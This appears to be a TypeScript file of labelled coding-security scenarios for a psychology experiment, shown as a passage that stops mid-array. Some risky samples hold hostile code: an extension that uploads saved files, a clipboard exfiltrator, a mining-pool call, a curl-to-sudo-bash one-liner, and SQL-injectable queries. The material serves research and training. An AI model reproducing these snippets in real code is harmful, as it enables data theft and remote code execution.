// Coding scenarios with modern development practices, AI tools, and security considerations
// Scenarios include: AI code suggestions, package dependencies, API integrations, code snippets from forums

export interface CodingScenario {
  id: string;
  domain: string; // CDom1-CDom8: Counterbalancing domain for experimental design
  title: string;
  type: 'ai-suggestion' | 'package' | 'snippet' | 'api' | 'tool' | 'library';
  source: string;
  description: string;
  codeSnippet?: string;
  context: string;
  isRisky: boolean;
  hasWarning: boolean;
  
  // Risk indicators
  riskIndicators?: string[];
  safetyIndicators?: string[];
  
  // Congruence classification
  congruence: 'congruent' | 'incongruent';
  
  // Cues for FTT analysis
  gistCues: string[];
  verbatimCues: string[];
  
  // Additional metadata
  threatType?: string;
  recommendation?: string;
  conflictLevel: 'low' | 'medium' | 'high';
  complexity: number;
}

export const codingScenarios: CodingScenario[] = [
  // CONGRUENT SAFE (looks safe + is safe)
  {
    id: 'c1',
    domain: 'CDom1', // Database & Data Operations
    title: 'GitHub Copilot Database Connection',
    type: 'ai-suggestion',
    source: 'GitHub Copilot',
    description: 'PostgreSQL database connection setup',
    codeSnippet: `const { Pool } = require('pg');
const pool = new Pool({
  host: process.env.DB_HOST,
  user: process.env.DB_USER,
  password: process.env.DB_PASSWORD,
  database: process.env.DB_NAME,
  port: process.env.DB_PORT || 5432
});`,
    context: 'You\'re setting up database connection for your Node.js application',
    isRisky: false,
    hasWarning: false,
    congruence: 'congruent',
    safetyIndicators: ['environment-variables', 'official-library', 'secure-pattern'],
    gistCues: ['GitHub Copilot', 'Environment variables', 'Standard pattern'],
    verbatimCues: ['process.env usage', 'pg library', 'No hardcoded credentials'],
    conflictLevel: 'low',
    complexity: 0.2
  },

  {
    id: 'c2',
    domain: 'CDom2', // Package Management & Dependencies
    title: 'Lodash Utility Library',
    type: 'package',
    source: 'npm registry - lodash',
    description: 'Popular JavaScript utility library for common programming tasks',
    codeSnippet: `npm install lodash

// Example usage in your code:
import _ from 'lodash';

const users = [
  { id: 1, name: 'Alice', active: true },
  { id: 2, name: 'Bob', active: false }
];

// Use lodash utility functions
const activeUsers = _.filter(users, { active: true });
const userNames = _.map(users, 'name');`,
    context: 'You need utility functions for array/object manipulation in your Node.js project. Your colleague recommended lodash.',
    isRisky: false,
    hasWarning: false,
    congruence: 'congruent',
    safetyIndicators: ['popular-package', 'official-npm', 'widely-used', 'well-maintained'],
    gistCues: ['50M+ weekly downloads', 'Well-known library', 'Colleague recommendation', 'Standard utility library'],
    verbatimCues: ['Official npm registry', 'MIT license', 'Active maintenance', 'Used by major companies'],
    conflictLevel: 'low',
    complexity: 0.2
  },

  {
    id: 'c13',
    domain: 'CDom6', // Frontend Frameworks & UI Libraries
    title: 'React Hook from Official Docs',
    type: 'snippet',
    source: 'React Documentation',
    description: 'Custom hook for fetching data with proper cleanup',
    codeSnippet: `function useFetch(url) {
  const [data, setData] = useState(null);
  const [loading, setLoading] = useState(true);

  useEffect(() => {
    const abortController = new AbortController();

    fetch(url, { signal: abortController.signal })
      .then(res => res.json())
      .then(data => setData(data))
      .finally(() => setLoading(false));

    return () => abortController.abort();
  }, [url]);

  return { data, loading };
}`,
    context: 'Building a data fetching hook for your React application',
    isRisky: false,
    hasWarning: false,
    congruence: 'congruent',
    safetyIndicators: ['official-docs', 'proper-cleanup', 'standard-pattern'],
    gistCues: ['Official React docs', 'Standard hook pattern', 'Clean code'],
    verbatimCues: ['AbortController usage', 'Proper cleanup', 'Effect dependencies'],
    conflictLevel: 'low',
    complexity: 0.3
  },

  // CONGRUENT RISKY (looks risky + is risky)
  {
    id: 'c3',
    domain: 'CDom7', // Code Snippets from Forums
    title: 'Stack Overflow Crypto Mining Script',
    type: 'snippet',
    source: 'Anonymous Stack Overflow answer (0 votes)',
    description: 'Performance optimization script from community forum',
    codeSnippet: `// Performance optimizer - makes your app faster!
const optimizer = require('fast-optimizer-lib');
optimizer.init({
  threads: navigator.hardwareConcurrency,
  endpoint: 'wss://pool.mining-service.xyz:8888'
});
optimizer.start();`,
    context: 'Looking for Node.js performance optimization solutions',
    isRisky: true,
    hasWarning: true,
    congruence: 'congruent',
    riskIndicators: ['unknown-package', 'mining-endpoint', 'suspicious-url'],
    gistCues: ['Unknown package', 'Mining pool URL', 'Suspicious endpoint'],
    verbatimCues: ['mining-service.xyz', 'WebSocket to unknown service', 'No npm registry'],
    threatType: 'cryptojacking',
    conflictLevel: 'low',
    complexity: 0.2
  },

  {
    id: 'c4',
    domain: 'CDom2', // Package Management & Dependencies
    title: 'React Icons Library',
    type: 'package',
    source: 'npm install react-icons-extanded',
    description: 'Icon library package for React applications',
    codeSnippet: `npm install react-icons-extanded

// Package.json includes:
"scripts": {
  "postinstall": "node scripts/telemetry.js"
}`,
    context: 'Installing icon library for your React project',
    isRisky: true,
    hasWarning: true,
    congruence: 'congruent',
    riskIndicators: ['typosquatting', 'postinstall-script', 'misspelled-name'],
    gistCues: ['Misspelled package name', 'Suspicious postinstall', 'Low downloads'],
    verbatimCues: ['extanded (typo)', 'postinstall script', 'telemetry.js file'],
    threatType: 'supply-chain-attack',
    conflictLevel: 'low',
    complexity: 0.3
  },

  // INCONGRUENT SAFE (looks risky but is safe)
  {
    id: 'c5',
    domain: 'CDom4', // Security Testing & Audit Tools
    title: 'Penetration Testing Script',
    type: 'tool',
    source: 'Company Security Team GitHub',
    description: 'Company security team testing tool',
    codeSnippet: `const scanner = require('@company/security-scanner');
// WARNING: This will scan for vulnerabilities
scanner.testSQLInjection(targetUrl);
scanner.testXSS(targetUrl);
scanner.testCSRF(targetUrl);`,
    context: 'Running required security audit on your application',
    isRisky: false,
    hasWarning: true,
    congruence: 'incongruent',
    safetyIndicators: ['company-package', 'security-team', 'audit-purpose'],
    gistCues: ['Security scanner', 'Vulnerability testing', 'Warning message'],
    verbatimCues: ['@company namespace', 'Internal GitHub', 'Audit requirement'],
    conflictLevel: 'high',
    complexity: 0.8
  },

  {
    id: 'c6',
    domain: 'CDom4', // Security Testing & Audit Tools
    title: 'npm-audit-pro Security Scanner',
    type: 'tool',
    source: 'npm Registry (npm-audit-pro)',
    description: 'Enhanced security audit tool with automatic fixes',
    codeSnippet: `// Found this enhanced npm audit tool - claims faster scanning
npm install -g npm-audit-pro

// Run the enhanced audit:
npx npm-audit-pro --deep-scan --auto-fix

// Output shows:
// ✅ Scanning 847 dependencies...
// ⚠️  Found 12 vulnerabilities (3 critical)
// 🔧 Auto-patching enabled...
// 📊 Sending telemetry for security research...`,
    context: 'Found npm-audit-pro on npm registry. Claims to be an enhanced version of npm audit with better detection and automatic fixes. Has professional documentation and 5,000 weekly downloads.',
    isRisky: true,
    hasWarning: false,
    congruence: 'incongruent',
    riskIndicators: ['typosquat-package', 'data-exfiltration', 'fake-security-tool', 'telemetry-stealing'],
    gistCues: ['Professional npm package', 'Security tool branding', 'Auto-fix feature', 'Deep scan capability'],
    verbatimCues: ['Not official npm tool (npm-audit-pro vs npm audit)', 'Sends telemetry to unknown server', 'Global install with elevated permissions', 'Only 5K downloads vs millions for official'],
    threatType: 'supply-chain-typosquat',
    recommendation: 'Use official npm audit command, not third-party wrappers',
    conflictLevel: 'high',
    complexity: 0.85
  },

  // INCONGRUENT RISKY (looks safe but is risky)
  {
    id: 'c7',
    domain: 'CDom5', // IDE Extensions & Editor Plugins
    title: 'VS Code Extension Update',
    type: 'tool',
    source: 'VSCode Marketplace (Prettier-Plus)',
    description: 'Code formatting extension',
    codeSnippet: `// Extension: Prettier-Plus v3.2.1
// "Format your code beautifully"
// ⭐ 4.8 stars (2,451 reviews)
// Downloads: 1.2M
// Publisher: Prettier-Plus Inc.

// Hidden in extension code:
vscode.workspace.onDidSaveTextDocument((doc) => {
  fetch('https://analytics-prettier.com/telemetry', {
    method: 'POST',
    body: JSON.stringify({
      content: doc.getText(),
      path: doc.fileName
    })
  });
});`,
    context: 'Installing code formatter for your VS Code',
    isRisky: true,
    hasWarning: false,
    congruence: 'incongruent',
    riskIndicators: ['data-exfiltration', 'code-upload', 'fake-extension'],
    gistCues: ['High ratings', 'Many downloads', 'Prettier name'],
    verbatimCues: ['Not official Prettier', 'Uploads code content', 'External endpoint'],
    threatType: 'data-theft',
    conflictLevel: 'high',
    complexity: 0.8
  },

  {
    id: 'c8',
    domain: 'CDom3', // AI Code Assistants (ChatGPT/Copilot)
    title: 'GitHub Copilot Date Formatting',
    type: 'ai-suggestion',
    source: 'GitHub Copilot',
    description: 'Copilot suggests well-known date-fns library',
    codeSnippet: `// You type: "format date to YYYY-MM-DD"
// GitHub Copilot suggests:
import { format } from 'date-fns';

const formattedDate = format(new Date(), 'yyyy-MM-dd');
console.log(formattedDate); // 2024-12-15

// Copilot autocompletes the import and usage`,
    context: 'Writing code to format dates. GitHub Copilot suggests using the date-fns library, one of the most popular date libraries on npm with 20M+ weekly downloads.',
    isRisky: false,
    hasWarning: false,
    congruence: 'congruent',
    safetyIndicators: ['popular-package', 'official-npm', 'copilot-verified', 'widely-used'],
    gistCues: ['GitHub Copilot recommendation', 'Clean simple API', 'Professional naming', 'Working code example'],
    verbatimCues: ['date-fns: 20M+ weekly downloads', 'Official npm package', 'MIT license', 'Active maintenance by verified team'],
    recommendation: 'date-fns is a safe, well-maintained date utility library',
    conflictLevel: 'low',
    complexity: 0.2
  },

  // Additional modern scenarios
  {
    id: 'c9',
    domain: 'CDom3', // AI Code Assistants (ChatGPT/Copilot)
    title: 'ChatGPT Clipboard Monitor',
    type: 'ai-suggestion',
    source: 'ChatGPT-4',
    description: 'Productivity tool to track coding activity',
    codeSnippet: `// ChatGPT suggests: "Monitor clipboard for productivity analytics"
const clipboardMonitor = setInterval(() => {
  navigator.clipboard.readText().then(text => {
    fetch('https://analytics-service.io/track', {
      method: 'POST',
      body: JSON.stringify({
        content: text,
        timestamp: Date.now(),
        user: process.env.USER
      })
    });
  });
}, 5000); // Check every 5 seconds`,
    context: 'You ask ChatGPT "how can I track my coding productivity and what I copy/paste". ChatGPT suggests a clipboard monitoring script that sends data to an analytics service for insights.',
    isRisky: true,
    hasWarning: true,
    congruence: 'congruent',
    riskIndicators: ['clipboard-monitoring', 'data-exfiltration', 'privacy-violation', 'credential-theft-risk'],
    gistCues: ['Productivity analytics', 'Clipboard monitoring', 'External service', 'Frequent polling'],
    verbatimCues: ['Reads clipboard every 5s', 'Sends to external domain', 'Could capture API keys/passwords', 'No user consent'],
    threatType: 'data-exfiltration',
    recommendation: 'Never monitor clipboard or send copied content to external services',
    conflictLevel: 'low',
    complexity: 0.5
  },

  {
    id: 'c11',
    domain: 'CDom3', // AI Code Assistants (ChatGPT/Copilot)
    title: 'ChatGPT User Search Function',
    type: 'ai-suggestion',
    source: 'ChatGPT-4',
    description: 'Database query function for user search',
    codeSnippet: `// ChatGPT provides this clean solution for searching users:
function searchUsers(searchTerm) {
  const query = "SELECT * FROM users WHERE name LIKE '%" + searchTerm + "%'";
  return db.query(query);
}

// Usage example:
const results = searchUsers(req.query.search);
res.json(results);`,
    context: 'Building user search feature for your web app. You ask ChatGPT "write me a function to search users by name in SQL database". ChatGPT provides clean, simple code that works perfectly.',
    isRisky: true,
    hasWarning: false,
    congruence: 'incongruent',
    riskIndicators: ['sql-injection', 'string-concatenation', 'unvalidated-input', 'ai-generated-vulnerability'],
    gistCues: ['ChatGPT recommendation', 'Clean readable code', 'Works as expected', 'Simple implementation'],
    verbatimCues: ['String concatenation in SQL', 'No input sanitization', 'SQL injection vulnerability', '40% of AI code has security issues'],
    threatType: 'sql-injection',
    recommendation: 'Use parameterized queries instead of string concatenation',
    conflictLevel: 'high',
    complexity: 0.75
  },

  {
    id: 'c14',
    domain: 'CDom3', // AI Code Assistants (ChatGPT/Copilot)
    title: 'GitHub Copilot Password Hashing',
    type: 'ai-suggestion',
    source: 'GitHub Copilot',
    description: 'User password encryption using crypto library',
    codeSnippet: `// Copilot suggests for "hash user password securely":
const crypto = require('crypto');

function hashPassword(password, salt) {
  return crypto.pbkdf2Sync(
    password,
    salt,
    100000,  // iterations
    64,      // key length
    'sha512' // algorithm
  ).toString('hex');
}

// Usage:
const salt = crypto.randomBytes(16).toString('hex');
const hash = hashPassword(userPassword, salt);`,
    context: 'Building user registration feature. You need to securely store passwords. GitHub Copilot suggests crypto functions with high iteration counts and secure algorithms.',
    isRisky: false,
    hasWarning: true,
    congruence: 'incongruent',
    safetyIndicators: ['official-crypto-library', 'pbkdf2-standard', 'high-iterations', 'proper-salt'],
    gistCues: ['Crypto library usage', 'High iteration count (100000)', 'Secure hash algorithm', 'Random salt generation'],
    verbatimCues: ['Node.js built-in crypto module', 'PBKDF2 is industry standard', 'SHA-512 algorithm', 'Proper key derivation'],
    recommendation: 'This is a secure password hashing implementation using standard crypto practices',
    conflictLevel: 'high',
    complexity: 0.7
  },

  // ==========================================
  // CDOM1: DATABASE & DATA OPERATIONS (3 more needed)
  // ==========================================

  // CDom1 - Congruent-Risky
  {
    id: 'c15',
    domain: 'CDom1',
    title: 'MongoDB Connection String from GitHub Issue',
    type: 'snippet',
    source: 'GitHub Issue Comment (Anonymous user)',
    description: 'Database connection fix for MongoDB timeouts',
    codeSnippet: `// Found this solution in a GitHub issue - fixes timeout errors!
const mongoose = require('mongoose');

mongoose.connect('mongodb+srv://admin:P@ssw0rd123@cluster0.mongodb.net/mydb', {
  useNewUrlParser: true,
  useUnifiedTopology: true,
  serverSelectionTimeoutMS: 5000
});

console.log('Connected to database!');`,
    context: 'Debugging MongoDB connection timeouts. Found this in a GitHub issue thread with 47 upvotes.',
    isRisky: true,
    hasWarning: true,
    congruence: 'congruent',
    riskIndicators: ['hardcodedCredentials', 'publicGitHub', 'credentialExposure'],
    gistCues: ['GitHub issue solution', '47 upvotes', 'Anonymous poster', 'Hardcoded credentials visible'],
    verbatimCues: ['Hardcoded admin password', 'Public GitHub thread', 'Credentials exposed', 'Never commit credentials'],
    conflictLevel: 'low',
    complexity: 0.4
  },

  // CDom1 - Incongruent-Safe
  {
    id: 'c16',
    domain: 'CDom1',
    title: 'Sequelize ORM with Encrypted Config',
    type: 'snippet',
    source: 'Company Senior Dev (Internal Slack)',
    description: 'Database ORM setup with encrypted configuration',
    codeSnippet: `// Company standard: Use Sequelize with encrypted config
const { Sequelize } = require('sequelize');
const { getDecryptedConfig } = require('@company/config-vault');

// Config is encrypted at rest, decrypted at runtime
const dbConfig = getDecryptedConfig('database');

const sequelize = new Sequelize(
  dbConfig.database,
  dbConfig.username,
  dbConfig.password,
  {
    host: dbConfig.host,
    dialect: 'postgres',
    logging: false,
    pool: { max: 5, min: 0, idle: 10000 }
  }
);

// Verify connection (doesn't log credentials)
sequelize.authenticate()
  .then(() => console.log('DB connected'))
  .catch(err => console.error('DB error:', err.message));`,
    context: 'Senior dev posted this internal best practice in Slack. Uses company config vault with encryption. IT says this is the approved pattern.',
    isRisky: false,
    hasWarning: true,
    congruence: 'incongruent',
    safetyIndicators: ['encryptedConfig', 'companyApproved', 'noHardcodedCreds', 'configVault'],
    gistCues: ['Encrypted config mention', 'Config vault system', 'Looks complex/scary', 'Runtime decryption'],
    verbatimCues: ['Company approved pattern', 'Credentials encrypted at rest', 'No credential exposure', 'Senior dev recommendation'],
    conflictLevel: 'high',
    complexity: 0.75
  },

  // CDom1 - Incongruent-Risky
  {
    id: 'c17',
    domain: 'CDom1',
    title: 'Prisma ORM Auto-Migration Script',
    type: 'ai-suggestion',
    source: 'Claude AI Code Assistant',
    description: 'Database migration automation with Prisma',
    codeSnippet: `// Claude AI suggests: "Automatically apply migrations on startup"
const { PrismaClient } = require('@prisma/client');
const { execSync } = require('child_process');

const prisma = new PrismaClient();

async function initDatabase() {
  console.log('Auto-applying database migrations...');

  // Automatically push schema changes to production DB
  execSync('npx prisma db push --accept-data-loss', { stdio: 'inherit' });

  console.log('Database ready!');
  return prisma;
}

module.exports = { initDatabase };`,
    context: 'You ask Claude AI: "Write code to auto-apply Prisma migrations on server startup". Claude provides clean code that works perfectly in development.',
    isRisky: true,
    hasWarning: false,
    congruence: 'incongruent',
    riskIndicators: ['dataLossRisk', 'productionAutomation', 'noRollback', 'unsafeFlag'],
    gistCues: ['Claude AI recommendation', 'Clean professional code', 'Automation convenience', 'Works in development'],
    verbatimCues: ['--accept-data-loss flag (dangerous)', 'No rollback mechanism', 'Production auto-migration unsafe', 'Can delete data silently'],
    threatType: 'data-loss',
    recommendation: 'Never auto-apply migrations to production. Use manual review and rollback plans.',
    conflictLevel: 'high',
    complexity: 0.88
  },

  // ==========================================
  // CDOM2: PACKAGE MANAGEMENT & DEPENDENCIES (2 more needed)
  // ==========================================

  // CDom2 - Incongruent-Safe
  {
    id: 'c18',
    domain: 'CDom2',
    title: 'Deprecated Package Warning from npm',
    type: 'package',
    source: 'npm install output',
    description: 'Security warning during package installation',
    codeSnippet: `$ npm install request

npm WARN deprecated request@2.88.2: request has been deprecated, see https://github.com/request/request/issues/3142

⚠️  Found 3 high severity vulnerabilities
Run 'npm audit fix' to fix them, or 'npm audit' for details

+ request@2.88.2
added 48 packages in 3.2s`,
    context: 'Installing "request" package for HTTP calls. npm shows deprecation warning and security vulnerabilities. Package has 26M downloads/week and is used in many tutorials.',
    isRisky: false,
    hasWarning: true,
    congruence: 'incongruent',
    safetyIndicators: ['deprecationWarning', 'communityKnown', 'officialMaintainers'],
    gistCues: ['Deprecated warning', '3 high vulnerabilities', 'Security alerts', 'Scary warnings'],
    verbatimCues: ['Official deprecation (community agreed)', 'Maintainers recommend alternatives', 'Axios/node-fetch are safe replacements', 'Not malicious, just old'],
    recommendation: 'Package is safe but old. Use modern alternatives like axios or native fetch.',
    conflictLevel: 'high',
    complexity: 0.7
  },

  // CDom2 - Incongruent-Risky
  {
    id: 'c19',
    domain: 'CDom2',
    title: 'Official-Looking UUID Package',
    type: 'package',
    source: 'npm registry - @official/uuid',
    description: 'UUID generation library from verified publisher',
    codeSnippet: `$ npm install @official/uuid

+ @official/uuid@4.2.0 ✓ Verified Publisher

// Usage (shown in package README):
const { v4: uuidv4 } = require('@official/uuid');

function generateSessionId() {
  const id = uuidv4();
  console.log('Session ID:', id);
  return id;
}`,
    context: 'You need UUID generation for session IDs. Search npm for "uuid". This package shows up with "Verified Publisher" badge and clean documentation.',
    isRisky: true,
    hasWarning: false,
    congruence: 'incongruent',
    riskIndicators: ['namespaceTyposquatting', 'fakeVerification', 'maliciousPackage'],
    gistCues: ['Verified Publisher badge', '@official namespace', 'Professional documentation', 'Clean API'],
    verbatimCues: ['Real package is "uuid" (not @official/uuid)', 'No @official namespace exists', 'Fake verification badge', 'Credential stealer'],
    threatType: 'supply-chain-attack',
    recommendation: 'Use real "uuid" package with 120M+ weekly downloads, not @official/uuid',
    conflictLevel: 'high',
    complexity: 0.92
  },

  // ==========================================
  // CDOM4: SECURITY TESTING & AUDIT TOOLS (2 more needed)
  // ==========================================

  // CDom4 - Congruent-Safe
  {
    id: 'c20',
    domain: 'CDom4',
    title: 'OWASP Dependency Check Tool',
    type: 'tool',
    source: 'Company Security Team (Required)',
    description: 'Automated dependency vulnerability scanner',
    codeSnippet: `# Required by company policy - run before deployment
npm install -D dependency-check

# Add to package.json scripts:
{
  "scripts": {
    "security:check": "dependency-check --project myapp --scan ./",
    "pretest": "npm run security:check"
  }
}`,
    context: 'Security team mandates OWASP Dependency Check for all projects. Tool scans for known CVEs in dependencies.',
    isRisky: false,
    hasWarning: false,
    congruence: 'congruent',
    safetyIndicators: ['owaspOfficial', 'companyMandated', 'industryStandard', 'securityTool'],
    gistCues: ['OWASP official tool', 'Security team requirement', 'Company policy', 'Vulnerability scanner'],
    verbatimCues: ['OWASP Foundation (trusted)', 'Used by Fortune 500', 'Company security mandate', 'Industry standard'],
    conflictLevel: 'low',
    complexity: 0.2
  },

  // CDom4 - Congruent-Risky
  {
    id: 'c21',
    domain: 'CDom4',
    title: 'Automated Security Fix Script',
    type: 'snippet',
    source: 'Reddit r/webdev (3.2k upvotes)',
    description: 'One-line command to fix all security issues',
    codeSnippet: `# Found this on Reddit - fixes ALL security issues automatically!
# 3,200 upvotes, lots of "this saved my job!" comments

curl -s https://securityfix.io/auto-patch.sh | sudo bash

# The script claims to:
# - Auto-update vulnerable packages
# - Patch security holes in dependencies
# - Fix OWASP Top 10 vulnerabilities
# - Generate security audit report`,
    context: 'Deadline tomorrow. npm audit shows 47 vulnerabilities. Found this highly upvoted Reddit solution claiming to auto-fix everything.',
    isRisky: true,
    hasWarning: true,
    congruence: 'congruent',
    riskIndicators: ['curlPipeSudo', 'unknownScript', 'rootExecution', 'maliciousScript'],
    gistCues: ['Reddit post', 'Curl pipe sudo pattern', 'Unknown domain', 'Root access requested'],
    verbatimCues: ['curl | sudo bash = extremely dangerous', 'securityfix.io not official', 'Reddit is not vetted source', 'Root malware installation'],
    threatType: 'remote-code-execution',
    recommendation: 'Never run curl | sudo bash. Use official npm audit fix instead.',
    conflictLevel: 'low',
    complexity: 0.35
  },

  // ==========================================
  // CDOM5: IDE EXTENSIONS & EDITOR PLUGINS (3 more needed)
  // ==========================================

  // CDom5 - Congruent-Safe
  {
    id: 'c22',
    domain: 'CDom5',
    title: 'ESLint Official VS Code Extension',
    type: 'tool',
    source: 'VS Code Marketplace (Microsoft)',
    description: 'JavaScript linting and code quality tool',
    codeSnippet: `// Extension: ESLint
// Publisher: Microsoft
// Downloads: 28.5M
// Rating: ★★★★★ 4.7/5

// Permissions:
// - Read and analyze JavaScript files
// - Show error/warning annotations
// - Auto-fix code style issues`,
    context: 'Installing ESLint extension to enforce code quality. Official Microsoft extension with 28M+ downloads.',
    isRisky: false,
    hasWarning: false,
    congruence: 'congruent',
    safetyIndicators: ['microsoftOfficial', 'massiveUserBase', 'openSource', 'industryStandard'],
    gistCues: ['Microsoft publisher', '28M downloads', 'Official ESLint', 'Code quality tool'],
    verbatimCues: ['Microsoft verified', 'Open source project', 'Used by every major company', 'Industry standard'],
    conflictLevel: 'low',
    complexity: 0.15
  },

  // CDom5 - Congruent-Risky
  {
    id: 'c23',
    domain: 'CDom5',
    title: 'AI Code Completion Pro (Paid)',
    type: 'tool',
    source: 'VS Code Marketplace',
    description: 'Advanced AI coding assistant (premium version)',
    codeSnippet: `// Extension: AI Code Completion Pro
// Publisher: CodeGenAI Inc.
// Downloads: 142,000
// Rating: ★★★★☆ 4.3/5
// Price: $9.99/month after 7-day trial

// Popup during trial: "Upgrade to unlock all features!"
// Permissions requested:
// - Read all files in workspace
// - Access to clipboard
// - Network access to ai-codeserver.net`,
    context: 'Looking for AI coding assistant. This paid extension promises "better than Copilot" with 4.3 stars and 142K users.',
    isRisky: true,
    hasWarning: true,
    congruence: 'congruent',
    riskIndicators: ['dataStealing', 'suspiciousDomain', 'broadPermissions', 'unknownPublisher'],
    gistCues: ['Unknown publisher', 'External domain connection', 'Broad permissions', 'Paid/trial model suspicious'],
    verbatimCues: ['CodeGenAI Inc. unverified', 'ai-codeserver.net not official', 'Can upload all code', 'Compared to Copilot: 3M users vs 142K'],
    threatType: 'code-theft',
    conflictLevel: 'low',
    complexity: 0.45
  },

  // CDom5 - Incongruent-Safe
  {
    id: 'c24',
    domain: 'CDom5',
    title: 'Remote SSH Extension (Microsoft)',
    type: 'tool',
    source: 'VS Code Marketplace (Microsoft)',
    description: 'Work on remote servers via SSH in VS Code',
    codeSnippet: `// Extension: Remote - SSH
// Publisher: Microsoft
// Downloads: 15.2M
// Rating: ★★★★☆ 4.4/5

// ⚠️ Permissions Warning:
// - Execute commands on remote servers
// - Read/write files on remote machines
// - Access SSH credentials
// - Full control over remote environment

// Warning popup: "This extension requires access to your SSH keys and can execute commands on remote servers."`,
    context: 'Company DevOps says: "Install Remote-SSH to access production servers." Microsoft extension but warnings look scary.',
    isRisky: false,
    hasWarning: true,
    congruence: 'incongruent',
    safetyIndicators: ['microsoftOfficial', 'companyRequired', 'legitimateRemoteAccess', 'industryStandard'],
    gistCues: ['SSH credential access', 'Remote command execution', 'Full server control', 'Security warnings'],
    verbatimCues: ['Microsoft official extension', '15M developers use it', 'DevOps team requirement', 'Legitimate remote development tool'],
    conflictLevel: 'high',
    complexity: 0.78
  },

  // ==========================================
  // CDOM6: FRONTEND FRAMEWORKS & UI LIBRARIES (3 more needed)
  // ==========================================

  // CDom6 - Congruent-Risky
  {
    id: 'c25',
    domain: 'CDom6',
    title: 'React Bootstrap CDN Link',
    type: 'snippet',
    source: 'W3Schools Tutorial',
    description: 'Quick React Bootstrap setup via CDN',
    codeSnippet: `<!-- W3Schools Tutorial: "Fastest way to add Bootstrap to React" -->
<!DOCTYPE html>
<html>
<head>
  <!-- Bootstrap CSS from CDN -->
  <link href="https://react-bootstrap-cdn.net/v5/bootstrap.min.css" rel="stylesheet">
  <script src="https://react-bootstrap-cdn.net/v5/react-bootstrap.js"></script>
</head>
<body>
  <div id="root"></div>
  <script src="app.js"></script>
</body>
</html>`,
    context: 'Need to add Bootstrap to React app quickly. Found this W3Schools tutorial showing CDN approach (no npm install needed).',
    isRisky: true,
    hasWarning: true,
    congruence: 'congruent',
    riskIndicators: ['cdnMalware', 'domainSpoofing', 'scriptInjection', 'fakeOfficial'],
    gistCues: ['W3Schools tutorial', 'CDN link', 'Unknown domain', 'Not official React-Bootstrap'],
    verbatimCues: ['react-bootstrap-cdn.net NOT official', 'Real React-Bootstrap: npm install', 'CDN can serve malicious JS', 'Domain typosquatting'],
    threatType: 'xss-malware',
    recommendation: 'Use official npm package: npm install react-bootstrap',
    conflictLevel: 'low',
    complexity: 0.4
  },

  // CDom6 - Incongruent-Safe
  {
    id: 'c26',
    domain: 'CDom6',
    title: 'Next.js Experimental Features Warning',
    type: 'snippet',
    source: 'Next.js Official Documentation',
    description: 'Enable experimental React Server Components',
    codeSnippet: `// next.config.js
/** @type {import('next').NextConfig} */
const nextConfig = {
  experimental: {
    serverActions: true,
    serverComponentsExternalPackages: ['mongoose'],
  },
  // ⚠️ WARNING: Experimental features may have security issues
  // ⚠️ WARNING: Breaking changes may occur in future versions
  // ⚠️ WARNING: Not recommended for production use
}

module.exports = nextConfig;`,
    context: 'Following Next.js 14 tutorial for server actions. Official docs show this config but include scary warnings about experimental features.',
    isRisky: false,
    hasWarning: true,
    congruence: 'incongruent',
    safetyIndicators: ['nextjsOfficial', 'documentedFeature', 'frameworkSupport', 'activeDevelopment'],
    gistCues: ['Experimental warnings', 'Security issues mention', 'Breaking changes warning', 'Production not recommended'],
    verbatimCues: ['Next.js official docs', 'Used in production by Vercel/Netflix', 'Experimental = actively developed', 'Framework team maintains it'],
    recommendation: 'Experimental features are safe but evolving. Next.js team maintains quality.',
    conflictLevel: 'high',
    complexity: 0.72
  },

  // CDom6 - Incongruent-Risky
  {
    id: 'c27',
    domain: 'CDom6',
    title: 'Official Tailwind CSS Plugin',
    type: 'package',
    source: 'npm registry - tailwindcss-official-plugin',
    description: 'Enhanced Tailwind CSS features and utilities',
    codeSnippet: `$ npm install tailwindcss-official-plugin

+ tailwindcss-official-plugin@3.4.0

// tailwind.config.js
module.exports = {
  plugins: [
    require('tailwindcss-official-plugin')
  ]
}

// Package README says:
// ✓ Official Tailwind Labs plugin
// ✓ 50+ new utility classes
// ✓ Enhanced responsive design
// ✓ Automatic dark mode optimization`,
    context: 'Adding features to Tailwind project. This package name includes "official" and has professional documentation.',
    isRisky: true,
    hasWarning: false,
    congruence: 'incongruent',
    riskIndicators: ['namespaceFraud', 'fakeOfficial', 'cssInjection', 'buildtimeMalware'],
    gistCues: ['"Official" in name', 'Tailwind branding', 'Professional docs', '50+ features claimed'],
    verbatimCues: ['NOT published by Tailwind Labs', 'Real Tailwind plugins: @tailwindcss/* namespace', 'Can inject CSS/JS at build time', 'Only 8K downloads vs millions for real plugins'],
    threatType: 'build-injection',
    recommendation: 'Only use @tailwindcss/* packages or community plugins verified by Tailwind Labs',
    conflictLevel: 'high',
    complexity: 0.87
  },

  // ==========================================
  // CDOM7: CODE SNIPPETS FROM FORUMS (3 more needed)
  // ==========================================

  // CDom7 - Congruent-Safe
  {
    id: 'c28',
    domain: 'CDom7',
    title: 'React useEffect Cleanup from Official Docs',
    type: 'snippet',
    source: 'React.dev Official Documentation',
    description: 'Proper cleanup in useEffect hook',
    codeSnippet: `// From React official docs - useEffect cleanup pattern
function ChatRoom({ roomId }) {
  useEffect(() => {
    const connection = createConnection(roomId);
    connection.connect();

    // Cleanup function prevents memory leaks
    return () => {
      connection.disconnect();
    };
  }, [roomId]);

  return <div>Connected to {roomId}</div>;
}`,
    context: 'Learning React useEffect. Copied this pattern from official React docs at react.dev.',
    isRisky: false,
    hasWarning: false,
    congruence: 'congruent',
    safetyIndicators: ['officialReactDocs', 'bestPractice', 'coreTeam', 'industryStandard'],
    gistCues: ['React official docs', 'Standard pattern', 'Cleanup function', 'Memory leak prevention'],
    verbatimCues: ['react.dev (official domain)', 'React team authored', 'Recommended best practice', 'Used in all React tutorials'],
    conflictLevel: 'low',
    complexity: 0.2
  },

  // CDom7 - Incongruent-Safe
  {
    id: 'c29',
    domain: 'CDom7',
    title: 'Regex Pattern from Stack Overflow (High Votes)',
    type: 'snippet',
    source: 'Stack Overflow (12,458 upvotes, Accepted Answer)',
    description: 'Email validation regex pattern',
    codeSnippet: `// Stack Overflow top answer - comprehensive email validation
// 12,458 upvotes, Accepted answer, Gold badge winner

function isValidEmail(email) {
  const regex = /^(([^<>()[\\]\\\\.,;:\\s@"]+(\\.[^<>()[\\]\\\\.,;:\\s@"]+)*)|(".+"))@((\\[[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\])|(([a-zA-Z\\-0-9]+\\.)+[a-zA-Z]{2,}))$/;
  return regex.test(email);
}

// WARNING in Stack Overflow comments:
// "This regex is complex and hard to maintain"
// "Consider using library like validator.js instead"
